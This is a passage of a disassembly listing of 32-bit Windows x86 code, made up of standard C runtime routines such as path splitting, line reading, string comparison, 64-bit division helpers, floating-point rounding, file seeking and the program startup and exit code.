loc_4141E9: ; CODE XREF: sub_4141AD+19�j
; sub_4141AD+1F�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_4141F3
and byte ptr [eax], 0
loc_4141F3: ; CODE XREF: sub_4141AD+3A�j
; sub_4141AD+41�j
and [ebp+arg_0], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov [ebp+var_8], eax
mov esi, 0FFh
jz short loc_41426B
loc_414206: ; CODE XREF: sub_4141AD+88�j
mov cl, [eax]
movzx edx, cl
test byte_47A401[edx], 4
jz short loc_414217
inc eax
jmp short loc_414231
; ---------------------------------------------------------------------------
loc_414217: ; CODE XREF: sub_4141AD+65�j
cmp cl, 2Fh
jz short loc_41422B
cmp cl, 5Ch
jz short loc_41422B
cmp cl, 2Eh
jnz short loc_414231
mov [ebp+var_4], eax
jmp short loc_414231
; ---------------------------------------------------------------------------
loc_41422B: ; CODE XREF: sub_4141AD+6D�j
; sub_4141AD+72�j
lea ecx, [eax+1]
mov [ebp+arg_0], ecx
loc_414231: ; CODE XREF: sub_4141AD+68�j
; sub_4141AD+77�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_414206
mov edi, [ebp+arg_0]
test edi, edi
mov [ebp+var_8], eax
jz short loc_41426B
cmp [ebp+arg_8], 0
jz short loc_414266
sub edi, ebx
cmp edi, esi
jb short loc_41424F
mov edi, esi
loc_41424F: ; CODE XREF: sub_4141AD+9E�j
push edi
push ebx
push [ebp+arg_8]
call sub_4195CB
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_414266: ; CODE XREF: sub_4141AD+98�j
mov ebx, [ebp+arg_0]
jmp short loc_414275
; ---------------------------------------------------------------------------
loc_41426B: ; CODE XREF: sub_4141AD+57�j
; sub_4141AD+92�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_414275
and byte ptr [ecx], 0
loc_414275: ; CODE XREF: sub_4141AD+BC�j
; sub_4141AD+C3�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_4142C8
cmp edi, ebx
jb short loc_4142C8
cmp [ebp+arg_C], 0
jz short loc_4142A5
sub edi, ebx
cmp edi, esi
jb short loc_41428E
mov edi, esi
loc_41428E: ; CODE XREF: sub_4141AD+DD�j
push edi
push ebx
push [ebp+arg_C]
call sub_4195CB
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_4142A5: ; CODE XREF: sub_4141AD+D7�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_4142F0
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_4142B5
mov esi, eax
loc_4142B5: ; CODE XREF: sub_4141AD+104�j
push esi
push [ebp+var_4]
push edi
call sub_4195CB
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_4142F0
; ---------------------------------------------------------------------------
loc_4142C8: ; CODE XREF: sub_4141AD+CD�j
; sub_4141AD+D1�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_4142E6
sub eax, ebx
cmp eax, esi
jnb short loc_4142D7
mov esi, eax
loc_4142D7: ; CODE XREF: sub_4141AD+126�j
push esi
push ebx
push edi
call sub_4195CB
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_4142E6: ; CODE XREF: sub_4141AD+120�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_4142F0
and byte ptr [eax], 0
loc_4142F0: ; CODE XREF: sub_4141AD+FD�j
; sub_4141AD+119�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4141AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142F5 proc near ; CODE XREF: sub_4078FA+3409�p
; sub_4078FA+3436�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 18h
push offset stru_427760
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov edi, ebx
mov [ebp+var_1C], ebx
cmp [ebp+arg_4], 0
jg short loc_414313
xor eax, eax
jmp short loc_41436A
; ---------------------------------------------------------------------------
loc_414313: ; CODE XREF: sub_4142F5+18�j
mov esi, [ebp+arg_8]
mov [ebp+var_20], esi
push esi
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
loc_414324: ; CODE XREF: sub_4142F5+64�j
dec [ebp+arg_4]
jz short loc_41435B
dec dword ptr [esi+4]
js short loc_414338
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41433F
; ---------------------------------------------------------------------------
loc_414338: ; CODE XREF: sub_4142F5+37�j
push esi
call sub_417455
pop ecx
loc_41433F: ; CODE XREF: sub_4142F5+41�j
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jnz short loc_414351
cmp edi, ebx
jnz short loc_41435B
and [ebp+var_1C], 0
jmp short loc_41435E
; ---------------------------------------------------------------------------
loc_414351: ; CODE XREF: sub_4142F5+50�j
mov [edi], al
inc edi
mov [ebp+var_28], edi
cmp al, 0Ah
jnz short loc_414324
loc_41435B: ; CODE XREF: sub_4142F5+32�j
; sub_4142F5+54�j
and byte ptr [edi], 0
loc_41435E: ; CODE XREF: sub_4142F5+5A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414373
mov eax, [ebp+var_1C]
loc_41436A: ; CODE XREF: sub_4142F5+1C�j
call __SEH_epilog
retn
sub_4142F5 endp
; =============== S U B R O U T I N E =======================================
sub_414370 proc near ; DATA XREF: .rdata:stru_427760�o
mov esi, [ebp-20h]
sub_414370 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414373 proc near ; CODE XREF: sub_4142F5+6D�p
push esi
call sub_4166C5
pop ecx
retn
sub_414373 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414380 proc near ; CODE XREF: sub_4078FA+8DA�p
; sub_410A22+285�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_4143B2
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_4143B0
jz short loc_4143B2
sub ecx, 2
loc_4143B0: ; CODE XREF: sub_414380+29�j
not ecx
loc_4143B2: ; CODE XREF: sub_414380+9�j
; sub_414380+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_414380 endp
; =============== S U B R O U T I N E =======================================
sub_4143B9 proc near ; CODE XREF: sub_414460+CB�p
; sub_414906+1C�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_41F078
test eax, eax
jz short loc_4143DE
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_41F074
test eax, eax
jz short loc_4143DE
push [esp+arg_0]
call eax ; dword_42A034
loc_4143DE: ; CODE XREF: sub_4143B9+D�j
; sub_4143B9+1D�j
push [esp+arg_0]
call ds:dword_41F02C
int 3 ; Trap to Debugger
loc_4143E9: ; CODE XREF: sub_419706+C�p
push 8
call sub_416901
pop ecx
retn
sub_4143B9 endp
; =============== S U B R O U T I N E =======================================
sub_4143F2 proc near ; CODE XREF: sub_419738�p
push 8
call sub_41686D
pop ecx
retn
sub_4143F2 endp
; =============== S U B R O U T I N E =======================================
sub_4143FB proc near ; CODE XREF: .text:loc_414A66�p
mov eax, off_42C718
test eax, eax
jz short loc_414406
call eax ; sub_413498
loc_414406: ; CODE XREF: sub_4143FB+7�j
push esi
push edi
mov ecx, offset dword_42A00C
mov edi, offset dword_42A024
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_414431
loc_41441A: ; CODE XREF: sub_4143FB+30�j
test eax, eax
jnz short loc_41445D
mov ecx, [esi]
test ecx, ecx
jz short loc_414426
call ecx
loc_414426: ; CODE XREF: sub_4143FB+27�j
add esi, 4
cmp esi, edi
jb short loc_41441A
test eax, eax
jnz short loc_41445D
loc_414431: ; CODE XREF: sub_4143FB+1D�j
push offset sub_419794
call sub_41973E
mov esi, offset dword_42A000
mov eax, esi
mov edi, offset dword_42A008
cmp eax, edi
pop ecx
jnb short loc_41445B
loc_41444C: ; CODE XREF: sub_4143FB+5E�j
mov eax, [esi]
test eax, eax
jz short loc_414454
call eax
loc_414454: ; CODE XREF: sub_4143FB+55�j
add esi, 4
cmp esi, edi
jb short loc_41444C
loc_41445B: ; CODE XREF: sub_4143FB+4F�j
xor eax, eax
loc_41445D: ; CODE XREF: sub_4143FB+21�j
; sub_4143FB+34�j
pop edi
pop esi
retn
sub_4143FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414460 proc near ; CODE XREF: sub_414533+8�p
; sub_414544+8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push 8
call sub_416901
xor esi, esi
inc esi
cmp dword_479E9C, esi
pop ecx
jnz short loc_414488
push [ebp+arg_0]
call ds:dword_41F0B4
push eax
call ds:dword_41F0BC
loc_414488: ; CODE XREF: sub_414460+16�j
cmp [ebp+arg_4], 0
mov al, byte ptr [ebp+arg_8]
mov dword_479E98, esi
mov byte_479E94, al
jnz short loc_4144EE
mov ecx, dword_47B670
test ecx, ecx
jz short loc_4144CF
mov eax, dword_47B66C
sub eax, 4
cmp eax, ecx
jmp short loc_4144C8
; ---------------------------------------------------------------------------
loc_4144B2: ; CODE XREF: sub_414460+6D�j
mov eax, [eax]
test eax, eax
jz short loc_4144BA
call eax
loc_4144BA: ; CODE XREF: sub_414460+56�j
mov eax, dword_47B66C
sub eax, 4
cmp eax, dword_47B670
loc_4144C8: ; CODE XREF: sub_414460+50�j
mov dword_47B66C, eax
jnb short loc_4144B2
loc_4144CF: ; CODE XREF: sub_414460+44�j
mov eax, offset dword_42A028
mov esi, offset dword_42A030
cmp eax, esi
mov edi, eax
jnb short loc_4144EE
loc_4144DF: ; CODE XREF: sub_414460+8C�j
mov eax, [edi]
test eax, eax
jz short loc_4144E7
call eax
loc_4144E7: ; CODE XREF: sub_414460+83�j
add edi, 4
cmp edi, esi
jb short loc_4144DF
loc_4144EE: ; CODE XREF: sub_414460+3A�j
; sub_414460+7D�j
mov eax, offset dword_42A034
mov esi, offset dword_42A03C
cmp eax, esi
mov edi, eax
jnb short loc_41450D
loc_4144FE: ; CODE XREF: sub_414460+AB�j
mov eax, [edi]
test eax, eax
jz short loc_414506
call eax
loc_414506: ; CODE XREF: sub_414460+A2�j
add edi, 4
cmp edi, esi
jb short loc_4144FE
loc_41450D: ; CODE XREF: sub_414460+9C�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_41451E
push 8
call sub_41686D
jmp short loc_414530
; ---------------------------------------------------------------------------
loc_41451E: ; CODE XREF: sub_414460+B3�j
push [ebp+arg_0]
mov dword_479E9C, 1
call sub_4143B9
loc_414530: ; CODE XREF: sub_414460+BC�j
pop ecx
pop ebp
retn
sub_414460 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414533 proc near ; CODE XREF: .text:00414AB6�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_414460
add esp, 0Ch
retn
sub_414533 endp
; =============== S U B R O U T I N E =======================================
sub_414544 proc near ; CODE XREF: sub_4148E1+1C�p
; .text:00414AE3�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_414460
add esp, 0Ch
retn
sub_414544 endp
; =============== S U B R O U T I N E =======================================
sub_414555 proc near ; CODE XREF: .text:loc_414ABB�p
push 1
push 0
push 0
call sub_414460
add esp, 0Ch
retn
sub_414555 endp
; =============== S U B R O U T I N E =======================================
sub_414564 proc near ; CODE XREF: .text:loc_414AE8�p
push 1
push 1
push 0
call sub_414460
add esp, 0Ch
retn
sub_414564 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414580 proc near ; CODE XREF: sub_40FD69+3D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_4145A1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_4145F1
; ---------------------------------------------------------------------------
loc_4145A1: ; CODE XREF: sub_414580+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_4145AF: ; CODE XREF: sub_414580+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4145AF
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_4145DA
cmp edx, [esp+4+arg_4]
ja short loc_4145DA
jb short loc_4145E2
cmp eax, [esp+4+arg_0]
jbe short loc_4145E2
loc_4145DA: ; CODE XREF: sub_414580+4A�j
; sub_414580+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_4145E2: ; CODE XREF: sub_414580+52�j
; sub_414580+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_4145F1: ; CODE XREF: sub_414580+1F�j
pop ebx
retn 10h
sub_414580 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414600 proc near ; CODE XREF: sub_40FD69+24�p
; sub_413820+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_414622
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_414663
; ---------------------------------------------------------------------------
loc_414622: ; CODE XREF: sub_414600+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_414630: ; CODE XREF: sub_414600+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_414630
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_41465E
cmp edx, [esp+8+arg_4]
ja short loc_41465E
jb short loc_41465F
cmp eax, [esp+8+arg_0]
jbe short loc_41465F
loc_41465E: ; CODE XREF: sub_414600+4E�j
; sub_414600+54�j
dec esi
loc_41465F: ; CODE XREF: sub_414600+56�j
; sub_414600+5C�j
xor edx, edx
mov eax, esi
loc_414663: ; CODE XREF: sub_414600+20�j
pop esi
pop ebx
retn 10h
sub_414600 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414670 proc near ; CODE XREF: sub_41046C+22C�p
; sub_41046C+285�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp dword_47A3E0, 0
jz sub_419AF8
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_4146A4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_4146A4: ; CODE XREF: sub_414670+23�j
lea esp, [esp+8]
jnz sub_419AF8
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_4277A0
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_4277D0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jnz short loc_414732
cmp eax, 3FFh
jl short loc_41476A
psllq xmm1, xmm2
cmp eax, 432h
jg short loc_414703
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_414703: ; CODE XREF: sub_414670+86�j
; sub_414670+E1�j
ucomisd xmm7, xmm7
jnp short loc_41472D
mov edx, 3EDh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_4197D8
add esp, 10h
loc_41472D: ; CODE XREF: sub_414670+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_414732: ; CODE XREF: sub_414670+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 1
cmp eax, 0BFFh
jl short loc_41476D
cmp eax, 0C32h
jg short loc_414703
andpd xmm0, oword ptr ds:oword_427790
subsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_41476A: ; CODE XREF: sub_414670+7B�j
fldz
retn
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414670+DA�j
cmppd xmm3, oword ptr ds:oword_4277C0, 1
orpd xmm3, oword ptr ds:oword_4277C0
andpd xmm3, oword ptr ds:oword_4277B0
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_414670 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414794 proc near ; CODE XREF: sub_41046C+233�p
; sub_41046C+28C�p
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_4147F3
loc_4147B7: ; CODE XREF: sub_414794+69�j
fsubp st(1), st
test edx, edx
jns short loc_4147DB
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_414807
; ---------------------------------------------------------------------------
loc_4147DB: ; CODE XREF: sub_414794+27�j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_414807
; ---------------------------------------------------------------------------
loc_4147F3: ; CODE XREF: sub_414794+21�j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_4147B7
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_414807: ; CODE XREF: sub_414794+45�j
; sub_414794+5D�j
leave
retn
sub_414794 endp
; =============== S U B R O U T I N E =======================================
sub_414809 proc near ; CODE XREF: sub_414898+22�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
push edi
jz short loc_414887
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_414828
cmp edi, 1
jz short loc_414828
cmp edi, 2
jnz short loc_414887
loc_414828: ; CODE XREF: sub_414809+13�j
; sub_414809+18�j
and eax, 0FFFFFFEFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_414840
push esi
call sub_419CE8
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_414840: ; CODE XREF: sub_414809+28�j
push esi
call sub_41644D
mov eax, [esi+0Ch]
test al, al
pop ecx
jns short loc_414856
and eax, 0FFFFFFFCh
mov [esi+0Ch], eax
jmp short loc_41486A
; ---------------------------------------------------------------------------
loc_414856: ; CODE XREF: sub_414809+43�j
test al, 1
jz short loc_41486A
test al, 8
jz short loc_41486A
test ah, 4
jnz short loc_41486A
mov dword ptr [esi+18h], 200h
loc_41486A: ; CODE XREF: sub_414809+4B�j
; sub_414809+4F�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_419C3D
xor ecx, ecx
add esp, 0Ch
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_414895
; ---------------------------------------------------------------------------
loc_414887: ; CODE XREF: sub_414809+B�j
; sub_414809+1D�j
call sub_417C70
mov dword ptr [eax], 16h
or eax, 0FFFFFFFFh
loc_414895: ; CODE XREF: sub_414809+7C�j
pop edi
pop esi
retn
sub_414809 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414898 proc near ; CODE XREF: sub_410A22+2C6�p
; sub_410A22+402�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push offset stru_4277E0
call __SEH_prolog
push [ebp+arg_0]
call sub_416673
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414809
add esp, 0Ch
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4148D7
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_414898 endp
; =============== S U B R O U T I N E =======================================
sub_4148D7 proc near ; CODE XREF: sub_414898+31�p
; DATA XREF: .rdata:stru_4277E0�o
push dword ptr [ebp+8]
call sub_4166C5
pop ecx
retn
sub_4148D7 endp
; =============== S U B R O U T I N E =======================================
sub_4148E1 proc near ; CODE XREF: .text:00414A29�p
; .text:00414A4F�p ...
arg_0 = dword ptr 4
cmp dword_479EA8, 1
jnz short loc_4148EF
call sub_419FC1
loc_4148EF: ; CODE XREF: sub_4148E1+7�j
push [esp+arg_0]
call sub_419E4A
push 0FFh
call off_42C740
pop ecx
pop ecx
retn
sub_4148E1 endp
; =============== S U B R O U T I N E =======================================
sub_414906 proc near ; CODE XREF: .text:004149FF�p
; .text:00414A10�p
arg_0 = dword ptr 4
cmp dword_479EA8, 1
jnz short loc_414914
call sub_419FC1
loc_414914: ; CODE XREF: sub_414906+7�j
push [esp+arg_0]
call sub_419E4A
push 0FFh
call sub_4143B9
pop ecx
pop ecx
retn
sub_414906 endp
; ---------------------------------------------------------------------------
push 60h
push offset stru_4277F0
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_412DD0
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call ds:dword_41F0F8
mov ecx, [esi+10h]
mov dword_479E5C, ecx
mov eax, [esi+4]
mov dword_479E68, eax
mov edx, [esi+8]
mov dword_479E6C, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_479E60, esi
cmp ecx, 2
jz short loc_41498A
or esi, 8000h
mov dword_479E60, esi
loc_41498A: ; CODE XREF: .text:0041497C�j
shl eax, 8
add eax, edx
mov dword_479E64, eax
xor esi, esi
push esi
mov edi, ds:dword_41F078
call edi
cmp word ptr [eax], 5A4Dh
jnz short loc_4149C5
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_4149C5
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_4149DD
cmp eax, 20Bh
jz short loc_4149CA
loc_4149C5: ; CODE XREF: .text:004149A4�j
; .text:004149B1�j ...
mov [ebp-1Ch], esi
jmp short loc_4149F1
; ---------------------------------------------------------------------------
loc_4149CA: ; CODE XREF: .text:004149C3�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_4149C5
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_4149EB
; ---------------------------------------------------------------------------
loc_4149DD: ; CODE XREF: .text:004149BC�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_4149C5
xor eax, eax
cmp [ecx+0E8h], esi
loc_4149EB: ; CODE XREF: .text:004149DB�j
setnz al
mov [ebp-1Ch], eax
loc_4149F1: ; CODE XREF: .text:004149C8�j
push 1
call sub_41677E
pop ecx
test eax, eax
jnz short loc_414A05
push 1Ch
call sub_414906
pop ecx
loc_414A05: ; CODE XREF: .text:004149FB�j
call sub_4154C7
test eax, eax
jnz short loc_414A16
push 10h
call sub_414906
pop ecx
loc_414A16: ; CODE XREF: .text:00414A0C�j
call sub_419750
mov [ebp-4], esi
call sub_41A5BE
test eax, eax
jge short loc_414A2F
push 1Bh
call sub_4148E1
pop ecx
loc_414A2F: ; CODE XREF: .text:00414A25�j
call ds:dword_41F14C
mov dword_47B664, eax
call sub_41A49C
mov dword_479EA0, eax
call sub_41A3FA
test eax, eax
jge short loc_414A55
push 8
call sub_4148E1
pop ecx
loc_414A55: ; CODE XREF: .text:00414A4B�j
call sub_41A1C7
test eax, eax
jge short loc_414A66
push 9
call sub_4148E1
pop ecx
loc_414A66: ; CODE XREF: .text:00414A5C�j
call sub_4143FB
mov [ebp-20h], eax
cmp eax, esi
jz short loc_414A79
push eax
call sub_4148E1
pop ecx
loc_414A79: ; CODE XREF: .text:00414A70�j
mov [ebp-38h], esi
lea eax, [ebp-64h]
push eax
call ds:dword_41F148
call sub_41A15E
mov [ebp-68h], eax
test byte ptr [ebp-38h], 1
jz short loc_414A9A
movzx eax, word ptr [ebp-34h]
jmp short loc_414A9D
; ---------------------------------------------------------------------------
loc_414A9A: ; CODE XREF: .text:00414A92�j
push 0Ah
pop eax
loc_414A9D: ; CODE XREF: .text:00414A98�j
push eax
push dword ptr [ebp-68h]
push esi
push esi
call edi
push eax
call sub_40D1EF
mov edi, eax
mov [ebp-6Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_414ABB
push edi
call sub_414533
loc_414ABB: ; CODE XREF: .text:00414AB3�j
call sub_414555
jmp short loc_414AED
; ---------------------------------------------------------------------------
loc_414AC2: ; DATA XREF: .rdata:stru_4277F0�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-70h], ecx
push eax
push ecx
call sub_419FFA
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_414AD6: ; DATA XREF: .rdata:stru_4277F0�o
mov esp, [ebp-18h]
mov edi, [ebp-70h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_414AE8
push edi
call sub_414544
loc_414AE8: ; CODE XREF: .text:00414AE0�j
call sub_414564
loc_414AED: ; CODE XREF: .text:00414AC0�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414AFC proc near ; CODE XREF: sub_412BB5+4B�p
; sub_412E0D+4A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_414C08
test al, 40h
jnz loc_414C08
test al, 1
jz short loc_414B35
and dword ptr [esi+4], 0
test al, 10h
jz loc_414C08
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_414B35: ; CODE XREF: sub_414AFC+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_414B71
cmp esi, offset dword_42C920
jz short loc_414B5F
cmp esi, offset dword_42C940
jnz short loc_414B6A
loc_414B5F: ; CODE XREF: sub_414AFC+59�j
push ebx
call sub_41AA50
test eax, eax
pop ecx
jnz short loc_414B71
loc_414B6A: ; CODE XREF: sub_414AFC+61�j
push esi
call sub_41AA0C
pop ecx
loc_414B71: ; CODE XREF: sub_414AFC+51�j
; sub_414AFC+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_414BDE
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_414B9E
push edi
push eax
push ebx
call sub_41A961
mov [ebp+arg_4], eax
jmp short loc_414BD1
; ---------------------------------------------------------------------------
loc_414B9E: ; CODE XREF: sub_414AFC+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_414BBC
mov ecx, ebx
sar ecx, 5
mov ecx, dword_47A2E0[ecx*4]
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_414BC1
; ---------------------------------------------------------------------------
loc_414BBC: ; CODE XREF: sub_414AFC+A5�j
mov eax, offset dword_42D068
loc_414BC1: ; CODE XREF: sub_414AFC+BE�j
test byte ptr [eax+4], 20h
jz short loc_414BD4
push 2
push 0
push ebx
call sub_419C3D
loc_414BD1: ; CODE XREF: sub_414AFC+A0�j
add esp, 0Ch
loc_414BD4: ; CODE XREF: sub_414AFC+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_414BF2
; ---------------------------------------------------------------------------
loc_414BDE: ; CODE XREF: sub_414AFC+7C�j
xor edi, edi
inc edi
push edi
